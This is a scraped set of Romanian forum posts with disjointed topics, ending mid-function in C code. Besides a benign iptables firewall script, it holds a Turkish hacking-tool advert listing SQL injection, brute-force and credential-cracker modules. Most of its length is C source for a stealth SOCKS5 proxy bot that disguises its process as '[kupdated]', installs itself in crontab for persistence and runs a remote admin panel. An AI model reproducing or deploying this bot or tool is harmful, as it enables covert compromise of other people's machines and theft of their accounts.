ilbr22

O solutie ar fi sa ai mai multe FreeBSD-uri inaintea serverului tau, in asa fel incat atacatorul sa nu le poata atinge pe toate, iar domeniul sa fie pe toate ip-urile, un fel de dns pool ?

Dar in cazul in care ddosul este foarte puternic si mananca toate resursele primului server, acesta poate ajunge la tine si sa iti afecteze direct serverul principal ?

Aveti aici o lista mult mai mare care suporta modul monitor, eu am avut probleme si inca am in a gasii o placa pe gustul meu.

Eu am mai adoptat acest firewall mai de baza asa, nu neaaparat anti ddos, nu stiu cat de bun este dar pe mine m-a multumit. Am incercat sa il si comentez cat de mult am putut, tex ne poate lamurii mult mai bine si ne poate da detaliile necesare. # Instalare script Firewall #functie de sistem poate fi adaugat in startarea sistemului pt fedora adaugat in rc.local calea catre script #pt gentoo de copiat in /etc/init.d/ dupa care de executat comanda rc-update -a firewall default # #Mai trebuie sa editati variabilele functie de sistemul dvs # Declarare variabile firewall INTERNET="eth0" # interfata pe care se aplica regulile de firewall SERVICII="25 8000 http https 808 53 110 123 465 995 143 993 587 465" # servicii (porturi) care pot fi accesate din internet SERVICII1="25 110 53 123" # servicii (porturi) care pot fi accesate din internet SERVICII2="10000 ftp echo 1313 8080" # servicii (porturi) care pot fi accesate din internet pt adminn ADMIN2="89.101.153.254" #Admin home acces la porturile suplimentare pt admin #Initializare firewall cu "start" ex:"/etc/init/d/firewall start" si stabilirea regulilor folosind variabilele if [ "$1" = "start" ]; then echo "Porneste firewall" iptables -P INPUT DROP # blocheaza tot iptables -A INPUT -i ! ${INTERNET} -j ACCEPT # permite pachetelor de pe toate interfetele in afara de interfata cu internetul ( reteaua locala, loopback ) iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT # permite pachetele din conexiuni deja stabilite # accepta conexiuni noi pe porturile din $SERVICII for i in ${SERVICII}; do iptables -A INPUT -p tcp --dport ${i} -m state --state NEW -j ACCEPT done for i in ${SERVICII1}; do iptables -A INPUT -p udp --dport ${i} -m state --state NEW -j ACCEPT done # accepta conexiuni noi pe porturile din $SERVICII2 for i in ${SERVICII2}; do iptables -A INPUT -s ${ADMIN2} -p tcp --dport ${i} -m state --state NEW -j ACCEPT done # NAT, daca nu aveti nevoie, stergeti sau o comentati linia cu "#" # iptables -t nat -A POSTROUTING -o ${INTERNET} -j MASQUERADE fi # end if start #Oprire firewall cu "stop" ex:"/etc/init/d/firewall stop" si stergerea tabelelor iptables if [ "$1" = "stop" ]; then echo "Se opreste firewall" iptables -F INPUT iptables -P INPUT ACCEPT # opreste NAT, daca nu aveti nevoie, stergeti sau o comentati linia cu "#" #iptables -t nat -F POSTROUTING fi # end if stop #Restartare cu "restart" ex:"/etc/init/d/firewall stop" in cazul in care ati facut modificari in firewall si doriti sa le activati if [ "$1" = "restart" ]; then echo "Se restarteaza firewall" /etc/init.d/firewall stop #dupa caz modificati calea catre scriptul firewall /etc/init.d/firewall start #dupa caz modificati calea catre scriptul firewall fi # end if restart

aceeasi dilema o am si eu, am descarcat si e cu totul si cu totul altceva ( Infinite.Dreams.-.Sky.Force.SE.176x220.jar ) .... nu prea inteleg nici eu ce e cu feardotcom lan

asa zic si eu, el se ocupa in general cu scamu de lr si fura de pe la toti cunoscutii

Hedef Site Hacking Tool[BOT] - Private Script Coded by HeLia ÖNEMLI !!!!!! Eger scripti localde kullanmak istiyorsaniz AppServ 2.6.0 bilgisayirinizda yüklü olmalidir. ve register_globals = On register_long_arrays = On magic_quotes_gpc = On Bu fonksiyonlari php.ini'den off hale getirin. ÖNEMLI !!!!!! IMPORTANT !!!!!! If you want use this script on localhost : AppServ 2.6.0 must be installed in your pc and register_globals = On register_long_arrays = On magic_quotes_gpc = On Make this functions into Off in php.ini IMPORTANT !!!!!! [REVERSE-IP] in Public Version [FIND SCRIPTS] in Public Version [JOOMLA TOKEN SCAN] in Public Version [JOOMLA ADMIN PANEL BRUTE] in Private Version [JOOMLA SQL INJECTION] in Private Version [JOOMLA RFI SCAN] in Private Version [JOOMLA LFI SCAN] in Private Version [JOOMLA SHELL SCAN] in Private Version [WORDPRESS BRUTE FORCE] in Private Version [WORDPRESS SQL INJECTION] in Private Version [WORDPRESS RFI SCAN] in Private Version [OSCOMMERCE ADMIN ADD] in Private Version [VBULLETIN BRUTE FORCE] in Private Version [VBULLETIN DATA SQL SCAN] in Private Version [PAGERANK CHECKER] in Private Version [SQL INJECTION SCAN] in Private Version [FTP CRACKER] in Private Version [KNIGHT ONLINE CRACKER] in Private Version [METIN2 CRACKER] in Private Version <?php /* Hedef Site Hacking Tool[bOT] - Private Script Coded by HeLia ÖN - Pastebin.com

te ajut eu moca.

#include <stdio.h> #include <stdlib.h> #include <stdarg.h> #include <string.h> #include <time.h> #ifdef _WIN32 #include <winsock.h> #include <windows.h> #else #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <signal.h> #include <unistd.h> #include <ctype.h> #include <arpa/inet.h> #include <netinet/in.h> #include <netinet/tcp.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/time.h> #endif #define PORTNUM 4133 #define PROC_NAME "[kupdated]" #define PIDNAME "kupdated.so" #define CRONNAME "kupdatedc" #define BASHNAME "kupdatedb" #define STARTUP #define APPNAME "kupdated" #define VERSION "0.6" #define MAX_CONNECTIONS 103 #define LISTEN_BACKLOG 1024 #define BUFFER_SIZE 4096 #define MAX_RULES 16 #define MAX_IP_LENGTH 16 #define DEFAULT_POLICY_ALLOW 1 #define DEFAULT_POLICY_DENY 2 #define SSL_CONNECT_STRING_NOAUTH "CONNECT %s HTTP/1.0\r\nUser-Agent: Mozilla/4.0\r\nProxy-Connection: Keep-Alive\r\nPragma: No-Cache\r\n\r\n" #define SSL_CONNECT_STRING_AUTH "CONNECT %s HTTP/1.0\r\nUser-Agent: Mozilla/4.0\r\nProxy-Connection: Keep-Alive\r\nPragma: No-Cache\r\nProxy-Authorization: Basic %s\r\n\r\n" #define SSL_TERMINATE_STRING "\r\n\r\n" #define REJECTED_IP_MASK_FAILED "%s [%d] Connection Rejected... Connection Prohibited\n" #define REJECTED_LIMIT_REACHED "%s [%d] Connection Rejected... Connection Limit Reached\n" #define BAC_CONNECTION_REJECTED "%s BAC Connection Rejected... Busy Service\n" #define REJECTED_SOCKS5_FAIL "%s [%d] Connection Rejected... Socks 5 Authentication Failed\n" #define ADMIN_WAITING_BIND "%s Waiting For HTTP Connections On %s:%d\n" #define ADMIN_WAITING_NOBIND "%s Waiting For HTTP Connections On 0.0.0.0:%d\n" #define WAITING_BIND "%s Waiting For TCP Connections On %s:%d\n" #define WAITING_NOBIND "%s Waiting For TCP Connections On 0.0.0.0:%d\n" #define ACCEPTED_CONNECTION "%s Accepted Connection %d From %s\n" #define HTTP_ACCEPTED_CONNECTION "%s Accepted HTTP Connection %d From %s\n" #define SSL_FAILED_NO_TERMINATOR "%s [%d] SSL Tunnelling Failed, Could Not Retrieve Terminator\n" #define SSL_SUCCESSFUL "%s [%d] SSL Tunnelling Successful, Returned %d (%s)\n" #define SSL_OVERFLOW "%s [%d] SSL Overflow Of %d Bytes Detected\n" #define SSL_FAILED "%s [%d] SSL Tunnelling Failed, Returned %d (%s)\n" #define SHUTDOWN_REQUEST "%s Caught Shutdown Request... Terminating Gracefully\n" #define CAUGHT_SIGNAL "%s Caught Signal %d... Terminating Gracefully\n" #define CLOSING_LISTENING_SOCKET "%s Closing Listening Socket\n" #define CLOSING_HTTP_LISTENING_SOCKET "%s Closing HTTP Listening Socket\n" #define CONNECTION_CLOSED "%s Connection %d Closed\n" #define HTTP_CONNECTION_CLOSED "%s HTTP Connection %d Closed\n" #define SOCKS5_UNKNOWN_DATA "%s [%d] Unknown Data Received From Socks 5 Client\n" #define SOCKS5_NEGOTIATING "%s [%d] Negotiating Socks 5 Protocol\n" #define CONNECTION_ATTEMPT "%s Connection %d Attempting To Connect To %s:%d\n" #define CONNECTION_CONNECTED "%s Connection %d Connected To %s:%d\n" #define SSL_TUNNELLING "%s [%d] SSL Tunnelling To %s\n" #define ERROR_CONNECTION "%s [%d] %s:%d - Error %d (%s) - %s\n" #define ERROR_NO_CONNECTION "%s %s:%d - Error %d (%s) - %s\n" #define WINDOWS_DAEMON "%s Bouncer Daemonized - Console Inactive\n" #define LIST_ADMIN_SOCKS "<tr><td><center>%d</center></td><td>%s</td><td><center>%s</center></td><td><center> </center></td><td align=\"right\">%s</td><td align=\"center\"> </td></tr>" #define LIST_SOCKS "<tr><td><center>%d</center></td><td>%s</td><td><center>%s</center></td><td><center>%s</center></td><td align=\"right\">%s</td><td align=\"right\">%s KB</td></tr>" #define LIST_ADMIN "<tr><td><center>%d</center></td><td>%s</td><td><center>%s</center></td><td align=\"right\">%s</td><td align=\"center\"> </td></tr>" #define LIST "<tr><td><center>%d</center></td><td>%s</td><td><center>%s</center></td><td align=\"right\">%s</td><td align=\"right\">%s KB</td></tr>" #define TIMESTAMP_FORMAT "[%H:%M.%S]" #define HTTP_TERMINATOR "\r\n\r\n" #define HTTP_AUTH_HEADERS 1 #define HTTP_INDEX 2 #define HTTP_SHUTDOWN 3 #define HTTP_LIST 4 #define BASE64_WS 0xE0 #define BASE64_NOT_BASE64(a) (((a) | 0x13) == 0xF3) #define conv_ascii2bin(a) (data_ascii2bin[(a) & 0x7F]) #define WM_APP_BASE 0x8000 #define WM_STD_OUT_CHAR (WM_APP_BASE + 400) #define WM_STD_ERR_CHAR (WM_APP_BASE + 401) #define TRUE 1 #define FALSE 0 #define SUCCESS 0 #undef ERROR #define ERROR -1 #define BOUNCER_PIDFILE "kupdated.so" enum AccessStatus { csAllowed, csRejected }; enum ClientStatus { csBlank, csUnknown, csConnecting, csSocks, csAuthenticating, csAuthenticated, csAdmin }; #ifndef _WIN32 #define INVALID_SOCKET -1 typedef int SOCKET; #endif typedef struct { struct sockaddr_in SockAddrIn; struct sockaddr_in SockAddrOut; SOCKET s[2]; int status; long total_bytes; char socks5_response[64]; int socks5_bytes; char socks5_dest_host[256]; char socks5_dest_port[6]; char tunnel[256]; time_t start_time; } Client; typedef struct { SOCKET ls; int aport; struct sockaddr_in addr; char username[128]; char password[128]; char bind[64]; } Admin; typedef struct { SOCKET port; char d[255]; char t[255]; char bind[64]; char dest_host[255]; char dest_port[255]; char destination[255]; char tunnel[255]; char pidfile[255]; char logfile[255]; char t_user[128]; char t_password[128]; char s_user[128]; char s_password[128]; char a_user[128]; char a_password[128]; char cloak_name[128]; int socks5; int hWnd; int daemon; int adp; int debug; int tcpnodelay; } Options; #ifndef _WIN32 void sig_handler(int, siginfo_t *, void *); void write_pid(void); int daemonize(void); #else static void send_msg(HWND, UINT, WPARAM); #endif static void oline(FILE *, char *, ...); void oerror(char *, char *, int, int); char *timestamp(void); void close_client_sockets(int); char *format_float(float); int send_socks5_response(char *, int, int, int); void initsocks(int, char *, int); char *base64e(char *); void socketclose(SOCKET, int); void show_version(void); void show_usage(void); int matches(char *, char *); int allowed(int, int, int, int); int connect_to(int, char *, int, int, int); void ssl_tunnel(int, char *, char *, int); void socks_connect(int, char *, int); int set_non_blocking(SOCKET, int); int set_blocking(SOCKET, int); void bouncer_shutdown(int); int examine_http_request(char *); int base64d(char *, char *); void send_auth_headers(SOCKET, int); void send_index(SOCKET, int); void send_shutdown(SOCKET, int); int http_authorized(char *); void send_list(SOCKET, int, int); char *format_time(time_t); void initialise_options(void); #ifdef _WIN32 #include "win-errors.h" #endif SOCKET ls; time_t init_time; long connections = 0; long total_data = 0; char buffer[BUFFER_SIZE]; char arules[MAX_RULES][MAX_IP_LENGTH]; char drules[MAX_RULES][MAX_IP_LENGTH]; Client clients[MAX_CONNECTIONS + 1]; Options options; Admin admin; int main(int argc, char *argv[]) { int mx; int z; int i; int bytes; int so_reuseaddr = TRUE; int tcp_nodelay = TRUE; int len_inet = 0; int errssl = 0; int narules = 0; int ndrules = 0; struct sockaddr_in SockAddr; struct timeval tv; char *cp = NULL; char *x, *y; char *msgssl = NULL; char *auth_string = NULL; char auth_buffer[128]; fd_set fdset; fd_set cset; //check if proxy is running. FILE *f; int xx; char s[25]; int mainpid; char mainexe[512]; char cwd[256],*str; #ifdef STARTUP FILE *hfile; FILE *file; char croncmd[512]; char cronchm[512]; char crondel[512]; #endif #ifndef _WIN32 struct sigaction sact; #else WSADATA wData; int j; int k; #endif initialise_options(); options.daemon = 1; options.port = PORTNUM; options.socks5 = 1; //check if proxy is running. f = fopen(PIDNAME, "r"); if (f != NULL) { fgets(s, sizeof(s), f); xx = atoi(s); kill(xx, SIGCHLD); if (errno != ESRCH) { kill(0,9); exit(1); } } //set mainexe to a variable// strncpy(mainexe,argv[0],strlen(argv[0])); //add the bot to crontab #ifdef STARTUP getcwd(cwd,256); hfile=fopen(BASHNAME,"w"); fprintf(hfile, "#!/bin/sh\n"); fprintf(hfile, "cdd=\"%s\"\n",cwd); fprintf(hfile, "cd $cdd\n"); fprintf(hfile, "if [ -f %s ]\n", PIDNAME); fprintf(hfile, "then\n"); fprintf(hfile, "pid=`cat %s`\n", PIDNAME); fprintf(hfile, "if [ `ps -p $pid | wc -l` -eq 2 ]\n"); fprintf(hfile, "then\n"); fprintf(hfile, "exit\n"); fprintf(hfile, "fi\n"); fprintf(hfile, "rm -rf %s\n", PIDNAME); fprintf(hfile, "fi\n"); fprintf(hfile, "%s\n", argv[0]); fprintf(hfile, "exit 0\n"); fclose(hfile); file=fopen(CRONNAME,"w"); fprintf(file, "0,10,20,30,40,50 * * * * %s/%s >/dev/null 2>&1\n", cwd, BASHNAME); fclose(file); sprintf(croncmd,"crontab %s",CRONNAME); sprintf(cronchm,"chmod 777 %s",BASHNAME); sprintf(crondel,"rm %s",CRONNAME); system(croncmd); system(cronchm); system(crondel); //set pid variable mainpid = getpid(); //creates pid file// xx = getpid(); if (xx != 0) { FILE *fp; unlink(PIDNAME); fp = fopen(PIDNAME, "w"); if (fp != NULL) { fprintf(fp, "%u\n", xx); if (fflush(fp)) { fclose(fp); unlink(PIDNAME); } else fclose(fp); } else return 1; } #endif if(argc != 1) { for(i = 1; i < argc; i++) { if(strncmp(argv[i], "--port", 6) == 0) { if(argv[i + 1]) { options.port = atoi(argv[i + 1]); } } else if(strncmp(argv[i], "--destination", 13) == 0) { if(argv[i + 1]) { snprintf(options.d, sizeof(options.d), "%s", argv[i + 1]); snprintf(options.destination, sizeof(options.destination), "%s", options.d); } } else if(strncmp(argv[i], "--socks5", 8) == 0) { options.socks5 = 1; } else if(strncmp(argv[i], "--tunnel", 8) == 0) { if(argv[i + 1]) { snprintf(options.t, sizeof(options.t), "%s", argv[i + 1]); snprintf(options.tunnel, sizeof(options.tunnel), "%s", options.t); } } else if(strncmp(argv[i], "--bind", 6) == 0) { if(argv[i + 1]) { snprintf(options.bind, sizeof(options.bind), "%s", argv[i + 1]); } } #ifdef _WIN32 else if(strncmp(argv[i], "--gui", 5) == 0) { if(argv[i + 1]) { options.hWnd = atoi(argv[i + 1]); } } #else else if(strncmp(argv[i], "--pidfile", 9) == 0) { if(argv[i + 1]) { snprintf(options.pidfile, sizeof(options.pidfile), "%s", argv[i + 1]); } } #endif else if(strncmp(argv[i], "--daemon", 8) == 0) { options.daemon = 1; } else if(strncmp(argv[i], "--logfile", 9) == 0) { if(argv[i + 1]) { snprintf(options.logfile, sizeof(options.logfile), "%s", argv[i + 1]); } } else if(strncmp(argv[i], "--aport", 7) == 0) { if(argv[i + 1]) { admin.aport = atoi(argv[i + 1]); } } else if(strncmp(argv[i], "--abind", 7) == 0) { if(argv[i + 1]) { snprintf(admin.bind, sizeof(admin.bind), "%s", argv[i + 1]); } } else if(strncmp(argv[i], "--a_user", 8) == 0) { if(argv[i + 1]) { snprintf(admin.username, sizeof(admin.username), "%s", argv[i + 1]); } } else if(strncmp(argv[i], "--a_password", 12) == 0) { if(argv[i + 1]) { snprintf(admin.password, sizeof(admin.password), "%s", argv[i + 1]); } } else if(strncmp(argv[i], "--allow", 7) == 0) { if(narules == MAX_RULES) { options.port = 0; break; } if((ndrules == 0) && (options.adp == 0)){ options.adp = DEFAULT_POLICY_ALLOW; } if(argv[i + 1]) { strncpy(arules[narules++], argv[i + 1], strlen(argv[i + 1])); } } else if(strncmp(argv[i], "--deny", 6) == 0) { if(ndrules == MAX_RULES) { options.port = 0; break; } if((narules == 0) && (options.adp == 0)) { options.adp = DEFAULT_POLICY_DENY; } if(argv[i + 1]) { strncpy(drules[ndrules++], argv[i + 1], strlen(argv[i + 1])); } } #ifdef LINUX else if(strncmp(argv[i], "--cloak", 7) == 0) { if(argv[i + 1]) { snprintf(options.cloak_name, sizeof(options.cloak_name), "%s", argv[i + 1]); } } #endif else if(strncmp(argv[i], "--t_user", 8) == 0) { if(argv[i + 1]) { snprintf(options.t_user, sizeof(options.t_user), "%s", argv[i + 1]); } } else if(strncmp(argv[i], "--t_password", 12) == 0) { if(argv[i + 1]) { snprintf(options.t_password, sizeof(options.t_password), "%s", argv[i + 1]); } } else if(strncmp(argv[i], "--s_user", 8) == 0) { if(argv[i + 1]) { snprintf(options.s_user, sizeof(options.s_user), "%s", argv[i + 1]); } } else if(strncmp(argv[i], "--s_password", 12) == 0) { if(argv[i + 1]) { snprintf(options.s_password, sizeof(options.s_password), "%s", argv[i + 1]); } } else if(strncmp(argv[i], "--nodebug", 9) == 0) { options.debug = 0; } else if(strncmp(argv[i], "--tcpnodelay", 12) == 0) { options.tcpnodelay = 1; } } } if((options.port == 0) || ((admin.aport) && ((strlen(admin.username) == 0) || (strlen(admin.password) == 0))) || ((!admin.aport) && ((strlen(admin.bind) != 0))) || ((strlen(options.logfile) != 0) && (!options.debug)) || ((strlen(options.logfile) != 0) && (options.hWnd)) || ((strlen(options.d) == 0) && (!options.socks5)) || ((strlen(options.d) != 0) && (options.socks5)) || ((strlen(options.d) != 0) && (strstr(options.d, ":") == NULL) && (!options.socks5)) || ((strlen(options.t) != 0) && (strstr(options.t, ":") == NULL)) || (((strlen(options.t_user) == 0) && (strlen(options.t_password) != 0)) || ((strlen(options.t_user) != 0) && (strlen(options.t_password) == 0)) || ((strlen(options.t_user) != 0) && (strlen(options.t) == 0))) || (((strlen(options.s_user) == 0) && (strlen(options.s_password) != 0)) || ((strlen(options.s_user) != 0) && (strlen(options.s_password) == 0)) || ((strlen(options.s_user) != 0) && (!options.socks5)))) { options.hWnd = 0; show_version(); show_usage(); return(0); } strcpy(argv[0], PROC_NAME); if(options.daemon) { #ifdef _WIN32 options.debug = 1; show_version(); #endif options.debug = 0; #ifdef _WIN32 fprintf(stdout, WINDOWS_DAEMON, timestamp()); fflush(stdout); FreeConsole(); #else if(daemonize() == -1) { return(0); } #endif } if(strlen(options.t_user) != 0) { strncpy(auth_buffer, options.t_user, strlen(options.t_user)); strncat(auth_buffer, ":", 1); if(strlen(options.t_password) != 0) { strncat(auth_buffer, options.t_password, strlen(options.t_password)); } auth_string = base64e(auth_buffer); } show_version(); #ifdef _WIN32 if(WSAStartup(MAKEWORD(1,0), &wData) != 0) { oerror("WSAStartup", __FILE__, __LINE__, 0); return(-1); } #endif if((strlen(options.t) == 0) && (!options.socks5)) { snprintf(options.dest_host, sizeof(options.dest_host), "%s", strtok(options.d, ":")); snprintf(options.dest_port, sizeof(options.dest_port), "%s", strtok(NULL, "\n")); } else if(strlen(options.t) != 0) { snprintf(options.dest_host, sizeof(options.dest_host), "%s", strtok(options.t, ":")); snprintf(options.dest_port, sizeof(options.dest_port), "%s", strtok(NULL, "\n")); } #ifndef _WIN32 write_pid(); sact.sa_sigaction = sig_handler; sact.sa_flags = SA_SIGINFO; sigemptyset(&sact.sa_mask); if(sigaction(SIGINT, &sact, (struct sigaction *) NULL) == ERROR) { oerror("sigaction", __FILE__, __LINE__, 0); return(-1); } if(sigaction(SIGTERM, &sact, (struct sigaction *) NULL) == ERROR) { oerror("sigaction", __FILE__, __LINE__, 0); return(-1); } #endif memset(&SockAddr, 0, sizeof(struct sockaddr_in)); SockAddr.sin_family = AF_INET; SockAddr.sin_port = htons(options.port); if(strlen(options.bind) == 0) { SockAddr.sin_addr.s_addr = INADDR_ANY; } else { SockAddr.sin_addr.s_addr = inet_addr(options.bind); } for(i = 0; i < MAX_CONNECTIONS + 1; i++) { clients[i].s[0] = INVALID_SOCKET; clients[i].s[1] = INVALID_SOCKET; clients[i].status = csBlank; } if((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { oerror("socket", __FILE__, __LINE__, 0); return(-1); } if((setsockopt(ls, SOL_SOCKET, SO_REUSEADDR, (char *)&so_reuseaddr, sizeof(so_reuseaddr))) == ERROR) { oerror("setsockopt", __FILE__, __LINE__, 0); return(-1); } len_inet = sizeof(SockAddr); if((bind(ls, (struct sockaddr *)&SockAddr, len_inet)) == ERROR) { oerror("bind", __FILE__, __LINE__, 0); return(-1); } if((listen(ls, LISTEN_BACKLOG)) == ERROR) { oerror("listen", __FILE__, __LINE__, 0); return(-1); } if(strlen(options.bind) != 0) { oline(stdout, WAITING_BIND, timestamp(), options.bind, options.port); } else { oline(stdout, WAITING_NOBIND, timestamp(), options.port); } if(admin.aport) { memset(&admin.addr, 0, sizeof(struct sockaddr_in)); admin.addr.sin_family = AF_INET; admin.addr.sin_port = htons(admin.aport); if(strlen(admin.bind) == 0) { admin.addr.sin_addr.s_addr = INADDR_ANY; } else { admin.addr.sin_addr.s_addr = inet_addr(admin.bind); } if((admin.ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { oerror("socket", __FILE__, __LINE__, 0); return(-1); } if((setsockopt(admin.ls, SOL_SOCKET, SO_REUSEADDR, (char *)&so_reuseaddr, sizeof(so_reuseaddr))) == ERROR) { oerror("setsockopt", __FILE__, __LINE__, 0); return(-1); } if((bind(admin.ls, (struct sockaddr *)&admin.addr, len_inet)) == ERROR) { oerror("bind", __FILE__, __LINE__, 0); return(-1); } if((listen(admin.ls, LISTEN_BACKLOG)) == ERROR) { oerror("listen", __FILE__, __LINE__, 0); return(-1); } if(strlen(admin.bind) != 0) { oline(stdout, ADMIN_WAITING_BIND, timestamp(), admin.bind, admin.aport); } else { oline(stdout, ADMIN_WAITING_NOBIND, timestamp(), admin.aport); } } init_time = time(NULL); for( { FD_ZERO(&fdset); FD_ZERO(&cset); FD_SET(mx = ls, &fdset); if(admin.aport) { FD_SET(admin.ls, &fdset); mx = (admin.ls > (unsigned int)mx) ? admin.ls : mx; } for(i = 0; i <= MAX_CONNECTIONS; i++) { if(clients[i].status != csBlank) { if(clients[i].status == csConnecting) { FD_SET(clients[i].s[1], &cset); mx = (clients[i].s[1] > (unsigned int)mx) ? clients[i].s[1] : mx; } else { FD_SET(clients[i].s[0], &fdset); mx = (clients[i].s[0] > (unsigned int)mx) ? clients[i].s[0] : mx; if((clients[i].status == csAuthenticating) || (clients[i].status == csAuthenticated)) { FD_SET(clients[i].s[1], &fdset); mx = (clients[i].s[1] > (unsigned int)mx) ? clients[i].s[1] : mx; } } } } tv.tv_sec = 1; tv.tv_usec = 0; #ifdef _WIN32 if((z = select(mx + 1, &fdset, &cset, &cset, &tv)) > 0) { #else if((z = select(mx + 1, &fdset, &cset, NULL, &tv)) > 0) { #endif if(admin.aport) { if(FD_ISSET(admin.ls, &fdset)) { for(i = 0; i < MAX_CONNECTIONS + 1; i++) { if(clients[i].status == csBlank) { clients[i].total_bytes = 0; len_inet = sizeof(struct sockaddr_in); if((clients[i].s[0] = accept(admin.ls, (struct sockaddr *)&clients[i].SockAddrIn, &len_inet)) == INVALID_SOCKET) { oerror("accept", __FILE__, __LINE__, i + 1); break; } connections++; oline(stdout, HTTP_ACCEPTED_CONNECTION, timestamp(), i + 1, inet_ntoa(clients[i].SockAddrIn.sin_addr)); if(i == MAX_CONNECTIONS) { socketclose(clients[i].s[0], i); clients[i].s[0] = INVALID_SOCKET; oline(stdout, REJECTED_LIMIT_REACHED, timestamp(), i + 1); oline(stdout, CONNECTION_CLOSED, timestamp(), i + 1); break; } clients[i].total_bytes = 0; clients[i].start_time = time(NULL); clients[i].status = csAdmin; break; } } } } if(FD_ISSET(ls, &fdset)) { for(i = 0; i < MAX_CONNECTIONS + 1; i++) { if(clients[i].status == csBlank) { clients[i].total_bytes = 0; len_inet = sizeof(clients[i].SockAddrIn); if((clients[i].s[0] = accept(ls, (struct sockaddr *)&clients[i].SockAddrIn, &len_inet)) == INVALID_SOCKET) { oerror("accept", __FILE__, __LINE__, i + 1); break; } connections++; oline(stdout, ACCEPTED_CONNECTION, timestamp(), i + 1, inet_ntoa(clients[i].SockAddrIn.sin_addr)); if(i == MAX_CONNECTIONS) { socketclose(clients[i].s[0], i); clients[i].s[0] = INVALID_SOCKET; oline(stdout, REJECTED_LIMIT_REACHED, timestamp(), i + 1); oline(stdout, CONNECTION_CLOSED, timestamp(), i + 1); break; } clients[i].start_time = time(NULL); clients[i].status = csUnknown; if(allowed(i, options.adp, narules, ndrules) != csAllowed) { socketclose(clients[i].s[0], i); clients[i].status = csBlank; clients[i].s[0] = INVALID_SOCKET; oline(stdout, REJECTED_IP_MASK_FAILED, timestamp(), i + 1); oline(stdout, CONNECTION_CLOSED, timestamp(), i + 1); break; } if(options.tcpnodelay) { if((setsockopt(clients[i].s[0], IPPROTO_TCP, TCP_NODELAY, (char *)&tcp_nodelay, sizeof(tcp_nodelay))) == ERROR) { oerror("setsockopt", __FILE__, __LINE__, i + 1); close_client_sockets(i); break; } } if(options.socks5) { oline(stdout, SOCKS5_NEGOTIATING, timestamp(), i + 1); clients[i].status = csSocks; break; } connect_to(i, options.dest_host, (int)strtol(options.dest_port, &cp, 10), options.socks5, options.tcpnodelay); break; } } } for(i = 0; i < MAX_CONNECTIONS + 1; i++) { if(clients[i].status == csConnecting) { if(FD_ISSET(clients[i].s[1], &cset)) { if(recv(clients[i].s[1], NULL, 0, MSG_PEEK) == -1) { #ifndef _WIN32 if(errno != EAGAIN) { #else if(WSAGetLastError() != WSAEWOULDBLOCK) { WSASetLastError(10060); #endif oerror("connect", __FILE__, __LINE__, i + 1); close_client_sockets(i); break; } } oline(stdout, CONNECTION_CONNECTED, timestamp(), i + 1, inet_ntoa(clients[i].SockAddrOut.sin_addr), htons(clients[i].SockAddrOut.sin_port)); if(set_blocking(clients[i].s[1], i) == -1) { if(options.socks5) { send_socks5_response(clients[i].socks5_response, i, FALSE, clients[i].socks5_bytes); } close_client_sockets(i); break; } if(options.socks5) { if(strlen(options.t) != 0) { ssl_tunnel(i, clients[i].tunnel, auth_string, 1); } else { if(send_socks5_response(clients[i].socks5_response, i, TRUE, clients[i].socks5_bytes) == ERROR) { close_client_sockets(i); } else { clients[i].status = csAuthenticated; clients[i].total_bytes = 0; clients[i].start_time = time(NULL); } } } else { if(strlen(options.t) != 0) { ssl_tunnel(i, options.d, auth_string, options.socks5); break; } clients[i].status = csAuthenticated; clients[i].total_bytes = 0; clients[i].start_time = time(NULL); } } } if(clients[i].status != csBlank) { if(FD_ISSET(clients[i].s[0], &fdset)) { if(clients[i].status == csAdmin) { if((bytes = recv(clients[i].s[0], buffer, BUFFER_SIZE, 0)) < 1) { close_client_sockets(i); break; } buffer[bytes] = 0; if(strstr(buffer, HTTP_TERMINATOR) != NULL) { switch(examine_http_request(buffer)) { case HTTP_AUTH_HEADERS: send_auth_headers(clients[i].s[0], i); break; case HTTP_INDEX: send_index(clients[i].s[0], i); break; case HTTP_LIST: send_list(clients[i].s[0], i, options.socks5); break; case HTTP_SHUTDOWN: send_shutdown(clients[i].s[0], i); close_client_sockets(i); bouncer_shutdown(0); break; } close_client_sockets(i); } } else if(clients[i].status != csAuthenticating) { if(clients[i].status == csSocks) { initsocks(i, options.t, options.tcpnodelay); } else { if((bytes = recv(clients[i].s[0], buffer, BUFFER_SIZE, 0)) < 1) { close_client_sockets(i); break; } if((send(clients[i].s[1], buffer, bytes, 0)) == ERROR) { oerror("send", __FILE__, __LINE__, i + 1); close_client_sockets(i); break; } clients[i].total_bytes += bytes; total_data += bytes; } } } if((clients[i].status == csAuthenticating) || (clients[i].status == csAuthenticated)) { if(FD_ISSET(clients[i].s[1], &fdset)) { if((bytes = recv(clients[i].s[1], buffer, BUFFER_SIZE, 0)) < 1) { close_client_sockets(i); break; } if(clients[i].status == csAuthenticating) { y = strdup(buffer); if((x = strtok(y, " ")) != NULL) { if((x = strtok(NULL, " ")) != NULL) { errssl = atoi(x); if((x = strtok(NULL, "\r")) != NULL) { msgssl = x; } } } free(y); if(errssl == 200) { buffer[bytes] = 0; if((y = strstr(buffer, SSL_TERMINATE_STRING)) == NULL) { oline(stdout, SSL_FAILED_NO_TERMINATOR, timestamp(), i + 1); if(options.socks5) { send_socks5_response(clients[i].socks5_response, i, FALSE, clients[i].socks5_bytes); } close_client_sockets(i); break; } else { oline(stdout, SSL_SUCCESSFUL, timestamp(), i + 1, errssl, msgssl); if(options.socks5) { send_socks5_response(clients[i].socks5_response, i, TRUE, clients[i].socks5_bytes); } if(strlen(y) != strlen(SSL_TERMINATE_STRING)) { oline(stdout, SSL_OVERFLOW, timestamp(), i + 1, strlen(y) - strlen(SSL_TERMINATE_STRING)); y += strlen(SSL_TERMINATE_STRING); if((send(clients[i].s[0], y, strlen(y), 0)) == ERROR) { oerror("send", __FILE__, __LINE__, i + 1); close_client_sockets(i); break; } clients[i].total_bytes += (strlen(y) - strlen(SSL_TERMINATE_STRING)); total_data += (strlen(y) - strlen(SSL_TERMINATE_STRING)); } clients[i].status = csAuthenticated; clients[i].start_time = time(NULL); } } else { oline(stdout, SSL_FAILED, timestamp(), i + 1, errssl, msgssl); if(options.socks5) { send_socks5_response(clients[i].socks5_response, i, FALSE, clients[i].socks5_bytes); } close_client_sockets(i); break; } } else { if((send(clients[i].s[0], buffer, bytes, 0)) == ERROR) 